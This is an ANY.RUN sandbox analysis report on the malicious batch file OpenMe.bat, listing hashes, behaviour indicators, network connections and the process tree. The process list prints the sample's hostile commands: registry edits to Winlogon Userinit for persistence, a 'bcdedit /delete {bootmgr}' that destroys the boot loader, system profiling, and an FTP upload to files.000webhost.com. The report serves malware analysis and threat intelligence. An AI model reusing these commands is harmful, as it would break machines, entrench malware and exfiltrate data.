analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OpenMe.bat

Full analysis: https://app.any.run/tasks/800ddd44-4780-4739-ae76-0a6a82d25bd7
Verdict: Malicious activity
Analysis date: November 29, 2020, 20:30:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines
MD5:

B5E20664F2F60A88DE5942F7F1A30021

SHA1:

8CF23A3FB3A1A19127D9E49F5A574D34609631D0

SHA256:

1DD6F7D70B70352554783D2801DEA8CC3FC8966641D309DBA5D1AB7E349EF905

SSDEEP:

24:qdH7grM8OQzMk+V2MZK7iu+l+V2MZKHLFk9LQ9gu+CuuDn9ROnD69l6eGv9ggggM:gmrOrFp0Wep0HP9ggu2FrMq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 1852)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 1852)

    • Uses WMIC.EXE to obtain a system information

      • cmd.exe (PID: 1852)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs bcdedit.exe no specs ipconfig.exe no specs wmic.exe no specs wmic.exe no specs wmic.exe no specs ftp.exe

Process information

PID
CMD
Path
Indicators
Parent process
1852cmd /c ""C:\Users\admin\AppData\Local\Temp\OpenMe.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225547
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3596REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit /t REG_SZ /d "C:\Users\admin\AppData\Local\Temp\OpenMe.bat" /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
656REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShutdownWithoutLogon /t REG_SZ /d 1 /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280REG ADD HKLM\SOFTWARE\Classes\batfile\shell\edit\command /v (Default) /t REG_EXPAND_SZ /d "C:\Users\admin\AppData\Local\Temp\OpenMe.bat" /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2676bcdedit /delete {bootmgr} /cleanupC:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2788ipconfig C:\Windows\system32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3092wmic diskdrive get sizeC:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3412wmic bios get serialnumberC:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2200wmic cpu get nameC:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1680ftp -i -s:commandsfile.ftpC:\Windows\system32\ftp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
File Transfer Program
Exit code:
3221225786
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
64
Read events
64
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
1852cmd.exeC:\Users\admin\AppData\Local\Temp\commandsfile.ftptext
MD5:72757D09A1E437D0594F2058404625A2
SHA256:FF7F6218E694382BF8167BA351CCA7140DC26B386326DB1FDD6292CDDE04E492
1852cmd.exeC:\Users\admin\AppData\Local\Temp\SyIn.txttext
MD5:885BA0868CB690DF12564526B659ED52
SHA256:9193624C029FCEF22EE1325F35D3CBA1BFF969F218DDA6764081869DB4561DC4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1680
ftp.exe
145.14.144.10:21
files.000webhost.com
Hostinger International Limited
US
malicious

DNS requests

Domain
IP
Reputation
files.000webhost.com
  • 145.14.144.10
malicious

Threats

PID
Process
Class
Message
1680
ftp.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
OpenMe.bat